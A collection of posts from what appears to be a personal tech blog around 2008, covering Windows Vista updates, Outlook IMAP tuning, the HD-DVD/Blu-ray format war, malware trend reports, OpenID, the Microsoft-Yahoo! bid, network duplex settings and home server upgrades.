This morning I was able to watch anything I wanted with the blinds pulled open and the sun shining in the windows. I'm a happy camper.

Looks like Vista SP1 for the 64-bit version of the OS is now available publicly on Windows Update. No sign of the 32-bit version yet, but I'm glad to get it for this particular computer.

Knowledge Base article KB936330 is available, as is the release-notes publication at TechNet.

Recently my Outlook 2007 connection to my Google Apps mail account became increasingly slow and sluggish, to the point of extreme frustration. Slow syncs and a general sense of bloat were ruining my experience and making it close to unusable. During email syncs my system would practically hang as Outlook churned away.

Not acceptable. I either needed a solution or I needed to replace my email, contacts and calendaring solution. It was that bad. Now, I really have no desire to leave Outlook. It works great for me. What I needed was a fix, which was preferable to a wholesale replacement. I know Thunderbird works well, but at least for now it's just not an Outlook equal replacement.

So, I searched today for a solution and - what do you know - quickly found an article on Digital Inspiration that helped me clean up my server configuration and improve performance substantially. With the huge onslaught of spam over the past couple months, my GMail spam folder had grown to be HUGE, so removing that from the sync was probably a big deal. Also, I set up the inbox to grab headers only (different than the article suggests). In addition, I disabled a couple unused but active Outlook add-in's as described in this article.

The results? A speedy Outlook and no more hung apps. The sync with the Google IMAP servers is much faster. I actually can't believe I put up with the bad performance as long as I did. All resolved now.

It's official: The format war is over.

I'm not one bit ashamed to say I've been a HD-DVD guy ever since I made the shift to watching movies in the amazing world of hi-def last June. I've enjoyed the red label discs, I appreciate the combo-format packages, and it was HD-DVD that pushed me into doing a lot of research into 1080p projectors and then purchasing one that I have been very happy with.

I also bought a HD-DVD player for my dad and his significant other's new home the day after thanksgiving, and another one for my mom and step dad over the Christmas holiday. If nothing else, they play regular DVDs on their hi-def (1080p) sets beautifully. Too bad the HD-DVD format looks like it's officially out. Glad I got good prices and minimized the "damage." I suppose I'll probably be buying replacement hardware soon eh?

At any rate, with Netflix, Wal Mart, an ever-expanding list of film studios, Best Buy and others making announcements about either going exclusive Blu-ray or favoring the format... Well anyhow I have a question. :)

Which Blu-ray players should I be seriously looking at? Is there a no-brainer, best-bang-for-the-buck option out there? I'm not really interested in PS3 games, so swaying me in that direction might be tough. I'm looking for full 1080p coverage via HDMI. I can (and do) hope that a Blu-ray player for the Xbox 360 is in the works, but until that happens I have to see what else is out there, and it's not something I've paid full attention to.

Suggestions?

IBM Internet Security Systems' X-Force has released its annual report outlining the malicious software threat and trending landscape. In a nutshell, things are getting more complicated (landscape-wise) and the impact is becoming more technically complex. Read the report and you can directly glean as well as infer certain facts.

As malware becomes harder and harder to catch in real-time using currently-available technology (a trend that has become quite clear over the past year or more) and as the intent of the malicious software becomes more and more geared toward complete remote system control and access, the potential situation looks - I'll just say it - pretty darned bleak.

It's important to stay up-to-date if you're an IT or Security professional (or hard-core geek). Here are your links:

• The ars technica article: Annual IBM security report paints worrisome picture for 2008 (includes some good side-bar thoughts)
• The full IBM report download (PDF, about 3MB): IBM Internet Security Systems X-Force 2007 Trends Statistics

Quiz in the morning. :)

It's not like we didn't already know the malware (short for "malicious software") infection rate is increasing, but Google's security folks posted a technical paper and blog entry on Monday that illustrates the prevalence of "drive-by" malware distribution and just how big the problem has become.

Excerpt:

“During that time we have investigated billions of URLs and found more than three million unique URLs on over 180,000 web sites automatically installing malware” … “In the past few months, more than 1% of all search results contained at least one result that we believe to point to malicious content and the trend seems to be increasing.”

Add to that the fact that a significant and growing amount of newer malware recompiles itself into new forms each time it redistributes, making it virtually undetectable by current means, and the situation potentially becomes even scarier.

The technical paper is a very interesting read and explains some of the distribution techniques and designs. It also points out one piece of browser technology that has resurfaced to plague the security world many, many times: the iFrame.

The problem is most deeply rooted in China, where 67% of all malware distribution servers are located, and 64.4% of all landing sites (sites that point to a distribution site) are located. The next closest offending country is the United States, which accounts for about 15% of the distribution and landing sites. So, one can easily see where a significant portion of the problem lies. With the increases in business and trade taking place in China now, one has to worry about the future if computer systems are in such bad shape. Clearly, something needs to change.

If you're a security person, an IT server admin, work with web applications, develop web apps, or are for any reason interested in scary figures (such as the fact that "38.1% of the Apache servers and 39.9% of servers with PHP scripting support reported a version with security vulnerabilities."), read the report. It's worth the time you'll spend.

It looks like the Live Search team has announced they've released their MSN Bot v1.1 (and changed the user agent string to "msnbot/1.1"). They've noted two significant (and welcome) features.

• HTTP compression
• Conditional GETs

What does this mean for server owners and operators? Just a more-efficient way of crawling your sites for indexing, assuming your servers support the features. Most servers support HTTP compression, and links to instructions for configuring it are provided in the Live Search team's blog entry.

If you're interested in knowing whether your site/server supports these two features, the Live Search team has also put up a page where you can run a quick test.

Of course, depending on how they detect search indexing bots, some apps may need to add the new user agent string to their configurations.

Firefox, that other awesome web browser, is now available in a v3 B3 release for those who are willing and wanting to test the latest and greatest before it's all fully baked.

Here is the link to get to the download page and other pertinent information. Expect performance improvements, security improvements, usability enhancement and more. But, keep in mind it's a Beta release, which means it will likely be flaky and do things you might not like. In the words of the Firefox team:

Please note: We do not recommend that anyone other than developers and testers download the Firefox 3 Beta 3 milestone release. It is intended for testing purposes only.

Firefox 3 Beta 3 is now available for download. This is the eleventh developer milestone focused on testing the core functionality provided by many new features and changes to the platform scheduled for Firefox 3. Ongoing planning for Firefox 3 can be followed at the Firefox 3 Planning Center, as well as in mozilla.dev.planning and on irc.mozilla.org in #granparadiso.

Richard and I had a good conversation with Scott Kveton, OpenID personality extraordinaire, on the RunAs Radio podcast this week. Scott is chairman of the OpenID Foundation.

OpenID is a cool and upcoming technology and has seen significant attention in the past few weeks especially as Yahoo! became an OpenID provider, immediately followed by an announcement that Microsoft, Google, Yahoo!, IBM and Verisign had joined the board of the OpenID Foundation.

It's time to get on-board and know what OpenID is, how it might play with other technologies in the identity and access management space, and how you can learn more. That's what this show is all about.

Scott Kveton Shares His OpenID (MP3 link)
from the RunAs Radio podcast

Richard and Greg talk to Scott Kveton about OpenID. OpenID is a single sign-on solution that could very well make the classic username and password obsolete. This is a fast half hour - you'll find yourself wanting to listen again!

I somehow missed the release, but a little while back Microsoft released Windows Live OneCare v2.0, and in that release added support for 64-Bit Windows Vista. A few months ago (before OneCare v2) I had just bought a new laptop that came with the 64-bit Vista Ultimate edition pre-installed, and when I went to install the then-released version of OneCare, I was pretty disappointed that it would not work.

When I was in Costco the other day, I noticed a OneCare package on the shelf and picked it up to glance at the system requirements. Lo and behold, the packaging had changed and now indicated that 64-bit Vista was supported! When did they slip that in? I didn't see mention of it on the OneCare blog or anywhere else.

But hey, all I knew was it looked like I would be able to use it now, so I was looking forward to giving it a try.

Today I uninstalled my frustratingly cruddy other (to remain nameless) antivirus software and installed the OneCare suite. For about $40 a year I can protect three PCs and centrally manage two of them from the computer I designate as the "hub" machine. Nice.

OneCare v2 includes:

• Antivirus & Antispyware protection
• Online ID protection
• Bi-Directional Firewall
• Multi-PC management
• Printer sharing
• Data backup and restore capabilities
• Maintenance and cleanup tasks (defrag, clean up useless stuff, etc.)

It's an easy and quick install, and a good way to make sure you're protected. You can watch a product demo and download the free 90-day trial here.

On my Windows Vista Ultimate 64-bit laptop, one of today's many Microsoft patches keeps prompting to be installed over and over, even after it indicates it is successfully installed. The patch in question is related to Microsoft Knowledge Base article KB937287, and is a prerequisite to Vista SP1, which is set to be made available next month.

Update 937287 is a prerequisite package that contains updates to the Windows Vista installation software. The installation software is the component that handles the installation and the removal of software updates, language packs, optional Windows features, and service packs. Update 937287 is necessary to successfully install and to remove Windows Vista SP1 on all versions of Windows Vista. This update will be available on the Windows Update Web site soon after the release of update 935509 and before the release of Windows Vista SP1. 

I ran the installation for all of today's patches which applied to my computer (twelve of them in total) and this one kept hanging around. Each time I restarted the computer, Windows Update again prompted me to start the installation. Confusing and frustrating after the fourth or fifth time, to be sure (reminds me of a joke about the definition of "insanity" heh).

I was able to resolve this problem by downloading the individual 64-bit patch from the Microsoft Downloads site and installing it manually. Note that the linked download location is for 64-bit Vista OS users only. Once I did that, the prompts stopped and it shows up in the installation list as successfully installed on the machine. In fact, the list now shows all of the installation attempts as successful, with a separate line for each try. Only the first try now shows "failed." Strange.

It's interesting that the KB article points out that this update will be required in order to install Vista SP1 via Windows Update when it is released, but not if you chose to download and install the service pack manually (as it will contain the fix). Extra interesting is that for this update I was unable to install it via Windows Update, but was successful with the manual install.

At any rate, there have been a flurry of posts on a variety of forums and other sites today where people were having this problem. Some people were recommending grabbing a leaked version of SP1 Refresh 2 via non-MS sites (read: not a good idea) and installing that, but for those who wish to wait and make sure they get what MS releases when they release it, this option is probably better for you.

If it works, drop a comment. Actually, be sure to comment if it doesn't work for you, too. :)

Updating from IE6 to IE7 is a considerably good thing to do, but IT pros need to plan for these things in some cases for compatibility and other reasons, so awareness is important.

If you're an IT shop using Windows Software Update Services (WSUS), be aware that today marks the date that Microsoft planned to start automatically delivering Internet Explorer 7 to desktop machines as an automatic update on WSUS systems. Computers on WSUS-managed computers that have IE6 installed will be updated, either automatically or upon administrative approval, depending on your configuration.

So, if you don't want your IE software updated today, it's important to check that your WSUS system is set up to require administrative approval before updates are pushed to the machines on your network (this is the default setting, but I've seen it changed in many cases for "convenience").

From the Microsoft Knowledge Base article (KB946202):

If you have configured WSUS to "auto-approve" Update Rollup packages (this is not the default configuration), Windows Internet Explorer 7 will be automatically approved for installation after February 12, 2008 and consequently, you may want to take the actions below to manage how and when this update is installed. You will need to take action if:

• You use WSUS to manage updates in your organization.
• You have Windows XP Service Pack 2 (SP2)-based computers or Windows Server 2003 Service Pack 1 (SP1)-based computers that have Internet Explorer 6 installed.
• You do not want to upgrade Internet Explorer 6 machines to Windows Internet Explorer 7 at this time.
• You have configured WSUS to auto-approve Update Rollups for installation.

Important notes

• This does not apply to Windows Vista because Windows Internet Explorer 7 is a component of Windows Vista.
• The Internet Explorer Blocker Toolkit blocks only installation that occurs by using Windows Update and Automatic Update. The toolkit does not block distribution that occurs by using WSUS. This article concerns distribution that occurs by using WSUS. Internet Explorer 7 is already available in 23 languages by using Windows Update and Automatic Update. On February 12, 2008, Internet Explorer 7 will also be made available in Japanese by using Windows Update and Automatic Update

The KB article also includes instructions describing how to configure the WSUS server, if needed.

(reminded via Mary Jo Foley - All About Microsoft)

UPDATE: Want to be able to track a BlackBerry when it gets lost or stolen with a more robust online system? Check out GadgetTrak, available for GSM-based devices.

Got a Blackberry? Ever worried what you'd do if you lost it? Ever actually had to replace a lost one before? Lost or stolen, it's good to be able to find your handheld, especially if it has important data on it.

A couple years ago I was in Minnesota on a trip and went to play Frisbee^TM Golf with a friend. The course went through the woods and across a couple fields. When we got done, I realized my Blackberry phone was missing. Not good.

We used my friend's cell phone and started calling it. I got lucky that day. It was (thankfully) not on vibrate mode, and we eventually found it deep in the woods (where I had been forced to bushwhack in order to get to my flying disc). The battery was near dead.

Now it appears there's a better way. Berry Locator is a software program that will cause your Blackberry device to scream and flash - even when set on silent mode. When you lose your device (or if you can't find it in the house clutter) you just send it a specially-formed email and it wakes up and does its thing, letting you find it. Even better, if your BB has GPS capabilities, you send an email and it will reply via email with a map showing you the coordinate where the device is located. Plus, you can type text in the body of your email that will be displayed on the screen when it's activated, in case someone else finds (or otherwise has possession of) your Blackberry.

Combine that feature with a password, data encryption and the ability to nuke the device in a worst-case scenario (on a corporate BES system), and you're pretty good to go.

Cool capability, but it only works if you install it ahead of time. There's a free trial version, and when you decide to buy it, it's only five bucks.

• Berry Locator web page
• Direct OTA install download for Blackberry devices

It was pretty clear from the initial public offer that was made by Microsoft to acquire Yahoo! that Redmond intends to make it happen even if Yahoo! management doesn't want to go along. But just in case anyone doubted, today it became quite apparent that's the case. In a statement issued today, Microsoft says:

"It is unfortunate that Yahoo! has not embraced our full and fair proposal to combine our companies. Based on conversations with stakeholders of both companies, we are confident that moving forward promptly to consummate a transaction is in the best interests of all parties.

"We are offering shareholders superior value and the opportunity to participate in the upside of the combined company. The combination also offers an increasingly exciting set of solutions for consumers, publishers and advertisers while becoming better positioned to compete in the online services market.

"A Microsoft-Yahoo! combination will create a more effective company that would provide greater value and service to our customers. Furthermore, the combination will create a more competitive marketplace by establishing a compelling number two competitor for Internet search and online advertising.

"The Yahoo! response does not change our belief in the strategic and financial merits of our proposal. As we have said previously, Microsoft reserves the right to pursue all necessary steps to ensure that Yahoo!'s shareholders are provided with the opportunity to realize the value inherent in our proposal."

Looks like a lot of people are in for a ride. It will be interesting to see how this one turns out, to be sure.

Well, I love my Xbox360 HD-DVD drive, and watching full 1080p HD-DVD movies on the Elite model. I've bought about 10 or so HD-DVDs and have rented a few from NetFlix recently. But, in what is looking more and more like an inevitably certain format death, Netflix announced today that it will no longer be stocking new HD-DVD releases, and they'll eventually phase out the current titles from their stock.

In fact, as I was writing this post an email from Netflix just arrived that explains the change:

We're Going Blu-ray

Dear Greg,

You're receiving this email because you have asked to receive high-definition movies in the HD DVD format. As you may have heard, most of the major movie studios have recently decided to release their high-definition movies exclusively in the Blu-ray format. In order to provide the best selection of high-definition titles for our members, we have decided to go exclusively with Blu-ray as well.

While we will continue to make our current selection of HD DVD titles available to you for the next several months, we will not be adding additional HD DVD titles or reordering replacements.

Toward the end of February, HD DVDs in your Saved Queue will automatically be changed to standard definition DVDs. Then toward the end of this year, all HD DVDs in your Queue will be changed to standard definition DVDs. Don't worry, we will contact you before this happens.

You can click here to change your format preferences.

We're sorry for any inconvenience. If you have any questions or need further assistance, please call us at 1 (888) 638-3549.

-The Netflix Team

Well, sometimes you make a bet and you lose.

So, my (our) options at this point appear to be...

1. Wait around, hope against hope, and pray that HD-DVD miraculously sees a resurgence (umm, yeah...)
2. Hope someone builds a dual-format drive for the Xbox360 that can replace the one I have now (not likely)
3. Buy one of the new dual-format/combo drives that you can put in a PC and go that route (possibility, depending on what they end up costing, and I have to think about how and where I want to play movies)
4. Buy a PS3 (ouch, in so many ways)
5. Just give in and buy a Blu-ray stand-alone player (but I wonder if I should wait til they drop in price some more, they ain't cheap)

Any other ideas? Let me know!

I've been a monthly customer of T-Mobile's hotspot service for a few years. I used the service almost exclusively at Starbucks stores. So, with the new announcement that AT&T and Starbucks will be offering two-hour chunks of use for free if you have a Starbucks card (the refillable type) as well as a $20 per month unlimited use option. It looks like I will no longer need the more-expensive T-Mobile account. The only time I've ever used it outside of Starbucks was at airport locations (Red Carpet Club), and I'm not flying as much as I used to (thank goodness).

You can't really beat free WiFi, and it's everywhere these days (except Starbucks), so this is a smart move in my mind.

From BetaNews:

While final pricing structures could change, some details have come out: the service will cost $3.99 for two hours of Internet access. But those customers who register and use their Starbucks card will receive two hours of free access per day. An unlimited plan is available for $19.99, which includes access to over 70,000 AT&T hotspots worldwide.

Existing T-Mobile HotSpot customers aren't being left out in the cold; thanks to an agreement with AT&T, they can continue to access the Wi-Fi at Starbucks without paying extra.

(full story)

Also, see the ars techncia coverage at this link.

I don't think I have actually mentioned it here before (oops), but I use Twitter on a semi-regular basis to jot down thoughts, post my "status" and keep an eye on what some other people are doing. My Twitter name is greghughes (go figure), so feel free to add me to your follow list, or whatever. :)

Twitter has a mobile client (at m.twitter.com, but note that it only works on a mobile device) that works, but it's pretty basic and feature-incomplete. So, since I had some time this evening I decided to look around for software (to run on the PC) and web-based (for the iPhone) clients.

I found a few options, including a really nice web-based client specifically made for the iPhone (or the iPod Touch) called PocketTweets, which is clean in appearance and includes pretty much all the Twitter functionality. I can post my own Twitter updates (called "Tweets"), send replies to others, or anything else on Twitter I might want. It's certainly better than any of the other clients I found. Very cool.

Next I need to find a good Windows client that won't crash when run on a 64-bit OS. I've been using Snitter, which is pretty okay but doesn't quite work (update) reliably enough in my experience and I'm not much of a fan of bright and contrasty color schemes. Any ideas?

WTFs/m - that's perfect! I think my good QA friend Brent would probably agree (and laugh out loud)... Mild cartoon language follows, but the humor is worth it.

(discovered via Robert Hensing's blog)

Richard and I spent about 30 minutes the other day chatting with Bil Simser, all-around good guy and MS SharePoint MVP since 2004. SharePoint is a set of technologies I have been involved with since before day one, if that's even possible. I remember vividly deploying SharePoint Portal Server 2001 as a secure extranet site (something it really wasn't intended to do) before it was even released. SharePoint's come a long, long way since then for sure!

It's common for IT professionals to have SharePoint shoved into their laps unsuspectingly by users or prospective users as a platform for business intelligence or document management or collaboration, so it's a good idea to be aware, try it out, see what you can do with it (and what you can't), and what it takes to properly design, build, deploy and manage in the environment.

Listen to the show for analogies, buzz words, licensing, planning, components and other important things to think about when you find yourself in the world of SharePoint.

Bil Simser On Managing Sharepoint (MP3 link)
from RunAs Radio podcast

Richard and Greg talk to Bil Simser about the challenges of managing Sharepoint 2007. Bil points us to the SharePoint Capacity Tool (www.shrinkster.com/uhw) and comparisons between Windows SharePoint Services and Microsoft Office SharePoint Server (www.shrinkster.com/ui1). Check out Bil's blog at www.shrinkster.com/uhv.

Well, we knew it was coming. Apple's 16GB iPhone is here and it's $100 more than the one we already have. I wonder how many they'll build and sell. It looks like the only change is the storage capacity. For some I guess another 8GB is nice to have, but for me I don't need it. I'll make a move (quickly) when a 3G iPhone ships. Hopefully soon, and hopefully with features like MMS and video recording. iPhone is available in an 8GB model for $399 and the new 16GB model for $499.

There's also a 32GB iPod Touch. Now that's kinda cool. But I already have an iPhone, and if I buy another media player it will probably be a Zune.

So... Anyone buying?

If you had five minutes on stage what would you say? What if you only got 20 slides and they rotated automatically after 15 seconds?

That's the basic premise behind Ignite Portland, which is happening this week on Tuesday night at the Bagdad Theater in Portland, Oregon.

I'm going to be there - along with what looks like a few hundred others - checking out what people have to say. If you happen to be in the Portland area, why not come down and check it out? It's free. If you'll be there, sign up ahead of time so they can plan (not required, but nice to do) and let me know so we can say hi!

From the LiteOn people comes a great design for a mouse that I will gladly plunk down a few  bucks for if it ever makes it to the market. It received a RedDot Design Award, in fact. Here's hoping it finds a place in the real world.

The Moldable mouse can be shaped into pretty much whatever form you like. Goodbye RSI and Carpal Tunnel Syndrome? Just change the shape now and then. We can hope!

Moldable Mouse is made of non-toxic lightweight modeling clay, covered with nylon and polyurethane blend fabric. It can be kneaded into any shape the user prefers, and the shape is self-retaining. By allowing a wide variety of hand positions when holding the mouse, it reduces repeated motions of the same posture, thereby minimizing the chance of common mouse-related injuries such as the Carpal Tunnel Syndrome. The click buttons and touch-sensitive scroll pad of the mouse are stick-on parts with built-in RFID (Radio Frequency Identification Device), which can be repositioned for maximum comfort.

The nylon and polyurethane blend fabric covering comes in a variety of colors. The texture of the material feels similar to silk, but is much more flexible. Its softness significantly increases the comfort level of the mouse over that of the traditional plastic versions. Patterns and graphics can be printed on the fabric to make the Moldable Mouse more visually appealing. The base of the mouse, made of 100% recyclable PC/ABS plastic blend, houses the PCB (Printed Circuit Board), laser optics and batteries. Reducing plastic usage to a minimum by using mostly non-toxic clay and fabric, the Moldable Mouse is also an ecologically responsible product.

(via Engadget, via Wired)

The move Microsoft made this morning in publicly offering Yahoo! shareholders a pretty darned decent price per share to acquire the company was a fairly aggressive one, and honestly I've wondered for some time - along with everyone else - when someone would finally make the move. It just makes sense. With the announcement earlier this week by Yahoo! of it's financials and planned layoffs, the timing was about as perfect as it could get.

Everyone and their brother has blogged and commented on this, and I won't waste your time or mine telling you what I think (although I am interested in and have been thinking about the whole "how do you combine CardSpace and OpenID?" question, and there are some obvious and potentially very good answers to that one). Instead, I just wanted to point you to a well-written and (I think) good analysis by a few industry experts that was published today on betanews.com. I suggest you read it if - like me - you are at all interested in the deal and what it means.

Today came an announcement that represents a pretty big step in the identity space. Yahoo! announced they have rolled out beta support for OpenID v2.0 and that Yahoo! is now a provider of OpenIDs. In fact, anyone who has a Yahoo! account can quickly generate a Yahoo! or Flickr-branded OpenID to sign onto any web site that supports OpenID v2.0 for authentication. That's 248 million accounts at Yahoo! that can now potentially be leveraged across the Internet for sign-on.

OpenID is an important standard that came out of the open-source community, which will likely change the way we provide identifying information and gain access to secured web sites on the Internet. It allows its users to have a single identity that can be used across different sites on the Internet. It also allows users to have the proper level of control over how they identify themselves and who they want to trust with that process.

One significant key to success for OpenID as a standard is adoption by a set of trusted identity "providers" - or OpenID-issuing organizations that people are comfortable with when it comes to asserting their identity information. With Yahoo! a large number of regular, everyday people can use their existing accounts to perform OpenID logins on any site supporting the standard. In the future, the hope is that other consumer-trusted providers will see the value of brand recognition that goes along with being the OpenID provider for consumers. Yahoo has me as an OpenID client now, which means every time I log onto an OpenID-enabled site and use that ID, I am by default thinking on some level about Yahoo! -- Pretty smart. It's time for banks, other financial service providers, and similar industries to seriously start thinking this one through. It's coming, and now is the time to be on the bandwagon.

Where can you use your OpenID to log in? Lots of places. There's a list of web sites over at myopenid.com, a service provided by Portland company JanRain. The people at JanRain have created some great software and services around the OpenID standard that businesses can use to leverage OpenID, and that enable social networks around the standard. It's pretty cool stuff.

Here's some basic information about OpenID from the Yahoo! OpenID provider site:

What is OpenID?

In a nutshell, the OpenID technology makes life simpler by having only one username and password to remember.

Once you have enabled your Yahoo! account for OpenID access, you only need to remember your Yahoo! ID and password to use hundreds of websites... So bid farewell to password spreadsheets and stickies all over your desk!

When you are on a web site that supports OpenID login, simply look for a Yahoo! login button. Or if you see a text box with an OpenID icon, simply type in "yahoo.com". You will be sent to Yahoo! to verify your Yahoo! ID and password, and then you will be able to continue on.

You can find out even more at openid.net (the OpenID Foundation), and it's worth pointing out that you can also get an OpenID from a slew of other organizations - after all, it's all about making it your choice. The OpenID foundation keeps a list of providers on its wiki and at this link.

I'm going to go off on a bit of a (somewhat grumpy) lecture here in hopes that people will stop long enough to listen. A little Gestalt therapy, if you will. Ultimately I hope at least one person recognizes a need and acts on it.

If I had a dime for every time I have personally seen this one issue bite someone in the backside, I'd be a rich man. There are a zillion things that can go wrong on a mission-critical network, but of those things there are actually just a few that account for a substantial portion of the issues that typically bring critical services down.

So, if you run a network and have not addressed the one issue I will describe below, please take the time out of your day to start a plan to remediate the problem ASAP. Along the same lines, if you are not sure where you stand with regard to the issue, or if you have never checked but you feel confident because everything works today and always has so it can't possibly be an issue... Again, please just take the time to inspect your infrastructure and put a plan in place.

I should also say that if I had a dime for every time I've said exactly what you just read in the paragraph above, I'd be a rich man. I lost count long, long ago of the number of hours spent watching people try to avoid - in any way possible - checking the obvious and addressing it. Usually that's due to those egg-on-face concerns that go along with being they guy who missed something so simple and critical (albeit not too obvious) when it came time to learn the detailed intricacies of running a high-availability network.

Okay, enough with the harshness. Time for the issue at hand.

The number one network mistake I have seen people make on IP networks, over and over again, is using the default settings on their switches and servers that cause the network interfaces to auto-negotiate the speed and duplex settings.

Seriously, if your requirement is to provide high availability and your SLAs require your services be up, do not neglect the critical (but often skipped) process of manually configuring your NICs and switches to the proper setting. Just because the interface says it's running 100mbps and full-duplex doesn't mean it's working, and when your network takes a dive and you start losing packets you'll be sorry.

Along the same lines, never assume that one half of one percent of packet loss is no big deal. Seriously, if you are seeing retransmits on your network interfaces, something is likely wrong. Also, chances are that .5% loss is not being scattered evenly across your traffic. It may all be happening at once in bursts, and that hurts - a lot.

Again, if I had a dime for every time I (or someone working with me) recommended inspecting the interface settings, recommended changing them, and flagged interfaces where traffic analysis showed data transmission loss that was obviously causing network apps to fail... Well, let's just say it's amazing how hard it is to convince some people that their network is the cause of the issue.

Why am I being so blatantly blunt about this? Because I hope that the message will carry, that administrator egos will be set aside, and that people will understand that the real-world evidence based on years of actual experience, proven over and over again, bears out the fact that this will eventually happen to you if you have not already taken the steps to ensure it doesn't. Don't let that happen. Protect that ego now, rather than waiting for it to be damaged.

Finally, don't fall prey to the idea that just because you have high-grade HP, IBM and Dell Servers and Cisco switches that the money you (smartly) spent negates the need to set things up the right way, or that these vendors have everything figured out for you and set as defaults. Point of fact, this issue occurs just as often (if not even more so) with your expensive, data-center class hardware. In fact, Cisco switches have been somewhat famous for requiring intervention of the manual-configuration type. They even have a troubleshooting support article here that you can refer to for your configuration needs.

You have been advised. Now go do something about it. And forward this to every network administrator you know. The network (and ego) you save may be theirs. :)

I recently set up a Windows Live Workspace beta site, and while doing that I saw a program that I had not realized was available before, called SharedView. It's a program that is currently in beta (the release number as of this writing is beta 2), and it's a simple and effective app that lets you share your desktop or applications with someone else and lets the participants grant control of their computer desktop to others in the session. It's integrated into the Office Live Workspaces for collaboration purposes, but it's usable for a variety of purposes.

I didn't download the program immediately, but was intrigued by what Microsoft had put together. Then, as fate would have it, the next day my mom sent me a IM via my mobile device (she really is pretty tech-hip for a retiree, heh), telling me she had a little computer problem and needed some help. In the past we've tried to use remote desktop services and the help-request functions in the MSN/Live IM client, but firewalls always seem to get in the way and performance has tended to be lackluster. Anyhow, in the process of trying to solve the computer issue, it  often becomes too complicated to try to solve it via text messages, so in this case I hooked up my laptop, downloaded the SharedView client and set up a SharedView session with my LiveID account and pointed her to the download so she could join the session using my email address and a passcode.

Within a few short minutes she was online and in the SharedView session and I was able to see her desktop. I liked that I was able to point to things on her desktop and she could see what I was pointing at, without having to take control away (this feature is called Personal Mouse Pointers). Nice feature. When it became necessary, she easily (and intuitively, without specific instructions from me) granted me control and watched as I walked her through the fix, explaining it along the way. Several times I handed control back to her so she could do part of the tasks.

In the recent past I've paid for similar services from other companies that also work well. Some of them don't rely on an installed program like this one does, but the SharedView app download is small and simple and works well on either Windows XP SP2 or Vista. I'd like to see it offered as a click-once app to easy use (at least as an option, if this type of app can even be deployed that way).

One of the great tests of success in today's software utility market is usability. One way I gauge the usability of an app is via watching my mom use it. If she can pick it up without much prompting, it generally passes. If she can't figure it out, chances are others can't either, and so it fails. SharedView met the expectations of that litmus test. Another great example of meeting the usability requirements and needs of the average user is Windows Home Server, which I started using in my own home not too long ago and about which I have written a couple times. There's some true-quality stuff coming out of Redmond right now for the average user, and that's good to see.

Wow, I sure have been making use of my HP MediaSmart Windows Home Server since I acquired it late last year, and to be honest I have not really even scratched the surface. With 64-bit client support coming soon, I am excited about the future, too.

After working with a bunch of music, video and image files over the past few weeks, not to mention computer backups, the single 500GB drive that it came with is both a little small and represents a single point of failure that I realized I don't want to take a chance on. So, I logged onto newegg.com last weekend and ordered a 1TB Western Digital SATA2 hard drive at a great price. It arrived today,and I slapped it into one of the three open trays and slid it into the slot. Within half a minute the drive showed up in the Home Server console and I was able to add it to the storage with a couple clicks and a two minute waiting time:

What a slick and fool-proof process they've come up for adding drives in Windows Home Server. Anyone can do it. It's great stuff, and the add-on community is thriving - There's a whole slew of community-created programs that you can install on your home server to add functionality. It's quite useful and a lot of geeky fun.

With the addition of community programs and the overhead of the additional HP software, the memory's a bit short. So I have a 2GB sick of RAM sitting on my desk, wait for me to decide if warranty risks of taking it apart to beef up the RAM are worth it. Do I dare?